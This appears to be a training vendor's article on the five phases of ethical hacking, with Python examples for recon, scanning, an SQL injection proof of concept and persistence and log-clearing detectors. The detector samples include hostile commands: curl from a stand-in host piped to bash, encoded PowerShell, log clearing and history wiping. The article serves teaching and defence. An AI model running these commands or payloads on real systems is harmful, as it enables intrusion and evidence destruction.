Key Terms
Reconnaissance
The intelligence-gathering phase — the first and most time-intensive step, where attackers collect as much information as possible about a target before engaging it directly.
Exploitation
Leveraging a discovered vulnerability to gain unauthorised access to a system, application, or network resource.
Privilege Escalation
Elevating permissions after initial access — moving from a low-privilege foothold to administrator or root-level control over a system.
Covering Tracks
The final phase: removing or altering evidence of presence, such as log entries, file timestamps and shell histories, to avoid detection and attribution.

The framework every hacker follows

Whether it's a criminal group breaching a bank or a certified ethical hacker assessing a corporate network, the same five-phase model is the standard way the work is described. It is the structure of EC-Council's CEH v13 curriculum and is widely used across the penetration testing industry to plan, execute, and report on security assessments.

Understanding the framework serves two purposes. Offensively, it provides a systematic approach to testing — ensuring no attack surface is missed. Defensively, it tells security teams exactly where to place controls: if you know which phase an attacker is in, you know which detection and prevention mechanisms should be firing.

The five phases are sequential but not strictly linear. A skilled attacker will loop back — new information discovered during scanning may trigger additional reconnaissance; maintaining access may reveal previously unknown lateral movement opportunities. The phases are a thinking framework, not a rigid checklist.

Phase 1: Reconnaissance

Reconnaissance is the foundation of every successful attack. Before a single packet is sent toward a target, skilled attackers invest significant time understanding it — its technology, its people, its suppliers, and its public-facing exposure.

Reconnaissance divides into two categories. Passive reconnaissance gathers intelligence without touching the target's own systems, so nothing lands in its logs. Techniques include OSINT (Open Source Intelligence) from LinkedIn profiles and company pages, Shodan searches for exposed devices, Google dorking with operators such as site:, filetype:, and inurl:, WHOIS and DNS lookups against public registries and resolvers, job postings (a listing for a "Splunk Administrator" reveals the organisation's SIEM platform), and GitHub repository searches for leaked API keys or hard-coded credentials. Tools that automate this side include Maltego for link analysis and relationship mapping, theHarvester for email and subdomain harvesting, and Recon-ng as a modular OSINT framework.

Active reconnaissance makes direct contact with target systems: ping sweeps, DNS zone transfer attempts against the target's own nameservers, Nmap port scans, and banner grabbing to read software versions out of service responses. It is faster, but it is visible in the target's logs and to its IDS. Skilled attackers hold off active recon until passive methods have been exhausted, and then keep it as narrow as possible.
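The GitHub side of passive recon is worth seeing concretely, because it is the one step where a single regex can turn public source into working credentials. The following is an added example, not code from the page or from any tool it names: a small secret scanner you can point at a cloned repository. The AWS and GitHub token prefixes are the documented key formats; the generic "something called a secret assigned a quoted value" rule and its entropy cut-off are assumed heuristics, and every value in the constructed sample below is fake (the AWS key is the placeholder from AWS's own documentation).

```python
import math
import re
from typing import Dict, List, Tuple

# Detectors for credential formats that commonly leak into public repositories.
# AWS (AKIA/ASIA + 16 chars) and GitHub (ghp_/gho_/... + 36+ chars) are the
# documented key formats; the generic assignment rule is an assumed heuristic.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    # Generic: something named like a secret, assigned a quoted value of 12+ chars.
    "assignment_to_secret": re.compile(
        r"(?i)(?:api[_-]?key|secret|password|token)\b\s*[:=]\s*['\"]([^'\"\s]{12,})['\"]"
    ),
}


def shannon_entropy(s: str) -> float:
    """Bits per character: placeholders like 'xxxxxxxx' score near 0, real keys above ~3.5."""
    if not s:
        return 0.0
    n = len(s)
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    """Never copy a full secret into a report; keep a short prefix for triage only."""
    return value[:4] + "..." + f"({len(value)} chars)"


def scan_text(text: str, path: str, entropy_threshold: float = 3.5) -> List[Tuple[str, int, str, str]]:
    """Return (path, line_number, rule, redacted_value) for each hit in one file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        seen = set()  # values already reported by a specific rule on this line
        for rule, pattern in SECRET_PATTERNS.items():
            for m in pattern.finditer(line):
                value = m.group(1) if rule == "assignment_to_secret" else m.group(0)
                if rule == "assignment_to_secret":
                    # The generic rule fires on placeholders too: require the value
                    # to look random, and skip it if a specific rule already hit.
                    if value in seen or shannon_entropy(value) < entropy_threshold:
                        continue
                seen.add(value)
                findings.append((path, lineno, rule, redact(value)))
    return findings


def scan_files(files: Dict[str, str]) -> List[Tuple[str, int, str, str]]:
    """Scan a mapping of path -> contents (what a repo walk or `git grep` would feed in)."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(text, path))
    return out


# Constructed sample repository contents. Every value is fake.
SAMPLE_FILES = {
    "config/settings.py": (
        'API_KEY = "xxxxxxxxxxxxxxxxxxxx"\n'                          # placeholder, skipped
        'STRIPE_TOKEN = "sk_live_51H8xQ2kL9mN3pR7tV6wY"\n'          # generic rule, high entropy
        'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'               # AWS key format
        'GITHUB_TOKEN = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"\n'  # GitHub PAT format
    ),
    "deploy/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n",
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print("%s:%d  %s  %s" % finding)
```

Run against the sample it reports four findings and stays quiet on the `xxxx` placeholder; on a real clone, walk the tree and `git log -p` as well, because a key that was committed and later removed is still in history.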
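Banner grabbing is the simplest active technique and the one most likely to hand over an exact version string. Below is an added example, not code from the page: a connect-and-read banner grabber plus a parser that turns the raw reply into service, product and version. The regexes cover banner shapes common services actually emit (SSH, an HTTP Server header, vsFTPd/ProFTPD, Postfix-style SMTP greetings); the sample banners in the test are constructed. The grab is active and shows up in the target's logs, so use it only against systems you are authorised to test.

```python
import re
import socket
import sys
from typing import Dict, Optional


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Open a TCP connection and return the first bytes the service sends.

    SSH, FTP and SMTP announce themselves on connect; HTTP says nothing until
    asked, so a minimal HEAD request is sent on common web ports.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        if port in (80, 8000, 8080):
            sock.sendall(b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
        try:
            return sock.recv(2048).decode("utf-8", errors="replace")
        except socket.timeout:
            return ""


# Banner formats of common services; 'version' is optional because some
# daemons reveal only their name.
BANNER_RULES = [
    ("ssh", re.compile(r"^SSH-[\d.]+-(?P<product>[A-Za-z]+)[_-](?P<version>[\w.]+)")),
    ("http", re.compile(r"^Server:\s*(?P<product>[A-Za-z-]+)/(?P<version>[\w.]+)", re.M)),
    ("ftp", re.compile(r"^220[ -].*?(?P<product>vsFTPd|ProFTPD|Pure-FTPd|FileZilla)\D*(?P<version>[\d.]+)")),
    ("smtp", re.compile(r"^220 .*?ESMTP (?P<product>\w+)")),
]


def parse_banner(banner: str) -> Optional[Dict[str, Optional[str]]]:
    """Turn a raw banner into {service, product, version}; None if unrecognised."""
    for service, rule in BANNER_RULES:
        m = rule.search(banner)
        if m:
            groups = m.groupdict()
            return {"service": service, "product": groups["product"], "version": groups.get("version")}
    return None


if __name__ == "__main__":
    # Usage: python banner.py <host> <port>
    target, port = sys.argv[1], int(sys.argv[2])
    raw = grab_banner(target, port)
    print(repr(raw))
    print(parse_banner(raw))
```

The parsed version is what gets matched against CVE data in the next phase; an unparsed banner is still worth keeping verbatim, since "this host answers on 8443 with something that is not HTTP" is itself intelligence.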

Reconnaissance typically consumes the majority of attack planning time, commonly put at 60–70%, which surprises defenders who assume most effort goes into exploitation.

Recon Is Where the Effort Goes

The MGM Resorts 2023 breach reportedly started with a ten-minute LinkedIn search. Scattered Spider identified an employee, impersonated that person in a vishing call to the IT help desk, and obtained a credential reset. The intelligence-gathering was entirely passive; the phone call was the first active step, and it was enough. MGM put the cost of the incident at roughly $100M.

Phase 2: Scanning & Enumeration

With a target profile established, the attacker moves to active scanning — directly probing systems to map what is reachable and what software is running on each endpoint. Nmap is the industry-standard tool for port scanning, revealing open ports, service versions, and operating system fingerprints. Nessus and OpenVAS take this further, correlating discovered services against CVE databases to identify known vulnerabilities with CVSS severity scores.

Enumeration goes deeper than scanning: it extracts actionable data from identified services — user account lists from LDAP, network shares via SMB, routing tables, SNMP community strings, and application version details. A useful way to frame the distinction: scanning finds the doors; enumeration looks through the keyholes. The output of this phase is a prioritised list of attack vectors for the next phase.
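The scan-to-vector handoff is easier to see with the actual data structure. The following is an added example, not from the page or from the Nmap project: it reads the XML that `nmap -sV -oX` writes, keeps only open ports on hosts that are up, and orders them so the weakest service class comes first. The ranking table is an assumed, illustrative heuristic (plaintext and legacy protocols before hardened ones); a real assessment would fold in the vulnerability-scanner output as well. The XML sample is constructed in the shape nmap produces, with RFC 1918 addresses and made-up versions.

```python
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

# Assumed, illustrative ranking: lower number = look at it first.
SERVICE_PRIORITY = {
    "telnet": 1, "ftp": 1, "vnc": 1,
    "microsoft-ds": 2, "netbios-ssn": 2, "snmp": 2, "rpcbind": 2,
    "http": 3, "ssh": 3,
    "https": 4,
}


def parse_nmap_xml(xml_text: str) -> List[Dict]:
    """Extract open ports with service details from `nmap -sV -oX` output."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue  # down hosts carry no ports worth listing
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            findings.append({
                "host": ip,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
    return findings


def prioritise(findings: List[Dict]) -> List[Dict]:
    """Order the attack surface for Phase 3: weakest service class first, then host and port."""
    return sorted(findings, key=lambda f: (SERVICE_PRIORITY.get(f["service"], 9), f["host"], f["port"]))


# Constructed sample in the shape nmap writes. Not a real scan.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/29">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="10.0.0.6" addrtype="ipv4"/></host>
  <host><status state="up"/><address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Samba smbd" version="4.6.2"/></port>
    </ports>
  </host>
</nmaprun>"""


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_XML
    for f in prioritise(parse_nmap_xml(text)):
        print(f"{f['host']}:{f['port']}/{f['proto']}  {f['service']:<14} {f['product'] or ''} {f['version'] or ''}")
```

On the sample this yields telnet on 10.0.0.5, then SMB on 10.0.0.7, then SSH; the closed 443 and the down host never appear. The product/version fields are exactly what enumeration and the CVE lookup consume next.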

Phase 3: Gaining Access

This is the exploitation phase — where vulnerabilities identified during scanning are actively leveraged to breach a system. Methods include exploiting unpatched CVEs using frameworks like Metasploit, password spraying against authentication endpoints, spear phishing to deliver malware or capture credentials, SQL injection and other application-layer attacks, and chaining multiple low-severity misconfigurations that individually appear harmless.

The goal of this phase is not simply to enter a system — it is to reach a sensitive asset or achieve the stated objective of the engagement, while generating proof-of-concept evidence that demonstrates the vulnerability is genuinely exploitable rather than theoretical. In a penetration test, every action is timestamped and logged for the final report. In a criminal attack, speed and stealth take priority.
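What "genuinely exploitable rather than theoretical" means in practice: run the payload, show it changes the outcome, and record when you did it. The block below is an added example, not code from the page: a deliberately vulnerable login check beside its parameterised fix, driven by the same `' OR '1'='1` payload, with each attempt written to a timestamped evidence list of the kind a report appendix would carry. The in-memory SQLite table and its single user are constructed for the example.

```python
import sqlite3
from datetime import datetime, timezone
from typing import Dict, List


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's user table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse-battery-staple')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Deliberately vulnerable: attacker-controlled strings are spliced into the SQL.
    query = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Hardened: placeholders keep user input as data, never as SQL syntax.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def proof_of_concept() -> Dict[str, object]:
    """Run the same payload against both implementations and record timestamped evidence."""
    conn = setup_db()
    payload = "' OR '1'='1"  # turns the WHERE clause into: ... AND password = '' OR '1'='1'
    evidence: List[Dict[str, str]] = []

    def attempt(label: str, fn, username: str, password: str) -> bool:
        result = fn(conn, username, password)
        evidence.append({
            "time": datetime.now(timezone.utc).isoformat(),
            "test": label,
            "input": f"username={username!r} password={password!r}",
            "authenticated": str(result),
        })
        return result

    real = "correct-horse-battery-staple"
    return {
        "vulnerable_bypass": attempt("vulnerable/payload", login_vulnerable, "alice", payload),
        "vulnerable_legit": attempt("vulnerable/real-password", login_vulnerable, "alice", real),
        "hardened_bypass": attempt("hardened/payload", login_parameterised, "alice", payload),
        "hardened_legit": attempt("hardened/real-password", login_parameterised, "alice", real),
        "evidence": evidence,
    }


if __name__ == "__main__":
    for key, value in proof_of_concept().items():
        print(key, value)
```

The vulnerable path authenticates with the payload and with the real password; the hardened path authenticates only with the real password. That pair of results, with timestamps, is the proof-of-concept a report needs, and it is the only thing a tester should do with the finding: dumping the whole table would exceed the engagement's objective.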

Privilege escalation often occurs here as well — an initial foothold may provide only limited user-level access, which the attacker then elevates to administrator or root by exploiting local vulnerabilities, misconfigurations, or weak credential practices.

Phase 4: Maintaining Access

A single point of entry is fragile. Sophisticated attackers — and red team operators in authorised engagements — establish persistent access mechanisms that survive reboots, password resets, and basic incident response activities. Techniques include installing backdoors and rootkits, creating hidden administrator accounts, setting up scheduled tasks or cron jobs that re-establish connectivity, and configuring Command and Control (C2) channels that blend outbound traffic with legitimate web activity.

This phase is what threat hunters spend most of their time searching for. IBM's 2024 Cost of a Data Breach report put the average breach lifecycle, from initial compromise to containment, at 258 days. During that window, attackers map the internal network, exfiltrate data incrementally, and position themselves for the objective they were originally paid or motivated to achieve.
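Scheduled tasks and cron jobs are the persistence mechanism a hunter can check fastest, because the job definition itself is the indicator. Below is an added example, not code from the page: a parser for user crontab output (`crontab -l`) and a classifier that applies a handful of heuristics to any command line, whether from cron, from the "Task To Run" column of `schtasks /query /fo CSV /v`, or from EDR telemetry. The heuristics are assumed for this example and the crontab and task actions are constructed; a real hunt would baseline known-good jobs first so they are excluded rather than reviewed every run.

```python
import re
from typing import Dict, List

# Assumed heuristics for this example: the shapes attacker persistence commonly takes.
SUSPICIOUS = [
    ("download_and_exec", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")),
    ("encoded_payload", re.compile(r"base64\s+(-d|--decode)\b|-EncodedCommand\b|-enc\b", re.I)),
    ("world_writable_path", re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+")),
    ("reverse_shell", re.compile(r"/dev/tcp/|\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("powershell_hidden", re.compile(r"powershell[^\n]*-(w|windowstyle)\s*hidden", re.I)),
]

# User crontab format: five schedule fields or an @keyword, then the command.
CRON_LINE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(?P<cmd>.+)$")


def parse_crontab(text: str, source: str = "crontab") -> List[Dict]:
    """Return one entry per job line, skipping blanks, comments and VAR=value lines."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue
        m = CRON_LINE.match(stripped)
        if m:
            entries.append({"source": source, "line": lineno, "command": m.group("cmd").strip()})
    return entries


def entries_from_commands(source: str, commands: List[str]) -> List[Dict]:
    """Wrap command lines from any other source (schtasks CSV, EDR telemetry) the same way."""
    return [{"source": source, "line": i, "command": c} for i, c in enumerate(commands, start=1)]


def classify(entries: List[Dict]) -> List[Dict]:
    """Attach the name of every heuristic that fires; drop entries that trigger none."""
    hits = []
    for e in entries:
        reasons = [name for name, pat in SUSPICIOUS if pat.search(e["command"])]
        if reasons:
            hits.append({**e, "reasons": reasons})
    return hits


# Constructed sample crontab: one legitimate backup job, three persistence jobs.
SAMPLE_CRONTAB = """SHELL=/bin/bash
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh --full
*/10 * * * * curl -s http://203.0.113.10/u.sh | bash
@reboot /dev/shm/.cache/agent -c /dev/shm/.cache/cfg
30 4 * * 0 echo cGF5bG9hZA== | base64 -d | sh
"""

# Constructed "Task To Run" values as schtasks would list them.
WINDOWS_TASK_ACTIONS = [
    r"C:\Program Files\Vendor\Updater.exe /silent",
    r"powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]

if __name__ == "__main__":
    for hit in classify(parse_crontab(SAMPLE_CRONTAB)) + classify(entries_from_commands("schtasks", WINDOWS_TASK_ACTIONS)):
        print(f"{hit['source']}:{hit['line']}  {', '.join(hit['reasons'])}  {hit['command']}")
```

The backup job passes, the three others are flagged with the reason that fired, and the hidden PowerShell task trips two rules at once. Run it across `/var/spool/cron/crontabs/*`, `/etc/cron.d/*` (which add a user field after the schedule) and the scheduled-task export of every host, and diff the output against last week's.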

Phase 5: Covering Tracks

The final phase involves removing or obscuring evidence of the intrusion. Actions include clearing Windows Event Logs and Linux syslog entries, timestomping (rewriting file timestamps so that activity appears older, or to have happened at a different time), deleting shell history and temporary files, and using Living Off the Land Binaries (LOLBins), legitimate system tools such as PowerShell, certutil and wmic, so that whatever activity does get logged looks like routine administrative work.

In authorised penetration tests, ethical hackers document every action they took and do not delete real logs — the evidence trail is part of the deliverable. Understanding this phase is critical for defenders: if an attacker successfully covers their tracks, the breach may never be discovered, or may only be identified months later through indirect indicators.
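Most track-covering is itself noisy, provided the logs have already left the host. The following is an added example, not code from the page: a detector over event records as a SIEM would receive them, which flags the Windows "log cleared" events (1102 for Security, 104 for System/Application), command lines that match common anti-forensic actions, and a host that falls silent for longer than expected. The command-line heuristics and the 30-minute gap threshold are assumed for this example; the event records are constructed.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Windows event IDs written when a log is cleared. They vanish locally with the
# clear, but a forwarder has usually shipped them before that happens.
LOG_CLEARED_IDS = {1102: "Security log cleared", 104: "System/Application log cleared"}

# Command-line shapes of track-covering. Assumed heuristics for this example.
ANTI_FORENSICS = [
    ("wevtutil_clear", re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("powershell_clear", re.compile(r"\b(Clear|Remove)-EventLog\b", re.I)),
    ("usn_journal_delete", re.compile(r"\bfsutil\s+usn\s+deletejournal\b", re.I)),
    ("timestomp", re.compile(r"\btouch\s+-[rtd]\b|\.(LastWriteTime|CreationTime|LastAccessTime)\s*=", re.I)),
    ("shell_history", re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\bHISTSIZE=0\b", re.I)),
    ("syslog_wipe", re.compile(r"\brm\b.*\s/var/log/|>\s*/var/log/\S+", re.I)),
]


def detect(events: List[Dict], gap_minutes: int = 30) -> List[Dict]:
    """Flag log-clearing events, anti-forensic command lines and suspicious silence per host."""
    alerts = []
    for e in events:
        if e.get("event_id") in LOG_CLEARED_IDS:
            alerts.append({"host": e["host"], "ts": e["ts"], "rule": "log_cleared",
                           "detail": LOG_CLEARED_IDS[e["event_id"]]})
        cmd = e.get("command_line") or ""
        for name, pat in ANTI_FORENSICS:
            if pat.search(cmd):
                alerts.append({"host": e["host"], "ts": e["ts"], "rule": name, "detail": cmd})
    # A host that stops reporting is itself a signal: the forwarder was killed,
    # or the box was taken offline, before the clean-up.
    by_host: Dict[str, List[datetime]] = {}
    for e in events:
        by_host.setdefault(e["host"], []).append(datetime.fromisoformat(e["ts"]))
    for host, stamps in by_host.items():
        stamps.sort()
        for earlier, later in zip(stamps, stamps[1:]):
            if later - earlier > timedelta(minutes=gap_minutes):
                alerts.append({"host": host, "ts": earlier.isoformat(), "rule": "telemetry_gap",
                               "detail": f"no events for {later - earlier}"})
    return alerts


# Constructed sample: a Windows workstation (4688 = process creation) and a Linux
# host feeding auditd command lines. Hostnames and times are made up.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:00:00", "host": "WS01", "event_id": 4688, "command_line": r"C:\Windows\System32\notepad.exe"},
    {"ts": "2024-05-01T09:05:00", "host": "WS01", "event_id": 4688, "command_line": "wevtutil.exe cl Security"},
    {"ts": "2024-05-01T09:05:01", "host": "WS01", "event_id": 1102, "command_line": ""},
    {"ts": "2024-05-01T09:06:00", "host": "WS01", "event_id": 4688,
     "command_line": "powershell -c \"(Get-Item C:\\Users\\Public\\a.dll).LastWriteTime = '2019-01-01'\""},
    {"ts": "2024-05-01T10:30:00", "host": "WS01", "event_id": 4688, "command_line": r"C:\Windows\explorer.exe"},
    {"ts": "2024-05-01T09:00:00", "host": "srv-web", "event_id": None, "command_line": "bash -c 'history -c; unset HISTFILE'"},
    {"ts": "2024-05-01T09:10:00", "host": "srv-web", "event_id": None, "command_line": "rm -f /var/log/auth.log"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['ts']}  {a['host']:<8} {a['rule']:<16} {a['detail']}")
```

On the sample the wevtutil call, the 1102 that follows it, the PowerShell timestomp, the history wipe and the auth.log deletion all fire, and WS01's 84-minute silence is reported as a gap. Every one of these detections depends on the events having reached the SIEM before the host was cleaned.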

  • 258 days: average breach lifecycle from initial compromise to containment (IBM Cost of a Data Breach 2024)
  • 68%: of breaches involve a human element (Verizon DBIR 2024)
  • 60–70%: of attack planning time, by common estimate, is spent in Phase 1: Reconnaissance

The defender's perspective at each phase

Every phase of the attack lifecycle has a corresponding defensive control. Understanding the attacker's methodology is what allows defenders to place those controls precisely where they will be most effective.

  • Against Reconnaissance: Reduce your public footprint. Audit what information is publicly available about your organisation — remove unnecessary metadata from documents, restrict DNS zone transfers, consider private WHOIS registration, and run periodic OSINT assessments against your own domain.
  • Against Scanning: Deploy IDS/IPS systems that detect and alert on port scan patterns. Rate-limit authentication endpoints and monitor for service enumeration attempts against internal systems.
  • Against Exploitation: Patch management is one of the highest-impact controls, because a large share of successful exploitation targets known CVEs for which a patch already exists. Supplement it with web application firewalls, input validation and parameterised queries for web-facing assets, and with MFA and lockout policies against password spraying.
  • Against Persistence: Threat hunting — proactively searching for indicators of compromise rather than waiting for alerts — is the primary defence against established persistence mechanisms. Endpoint Detection and Response (EDR) tools provide visibility into scheduled tasks, registry modifications, and unusual process activity.
  • Against Covering Tracks: Immutable, centralised SIEM logs are essential. If log data is stored only on the endpoint being attacked, it can be cleared. Shipping logs in real time to an independent SIEM means even a sophisticated attacker cannot erase the trail that has already left the host, and the act of clearing becomes its own alert.
Train with VAPTIC
CEH v13 — Certified Ethical Hacker
All 5 phases covered across 20 modules with hands-on browser labs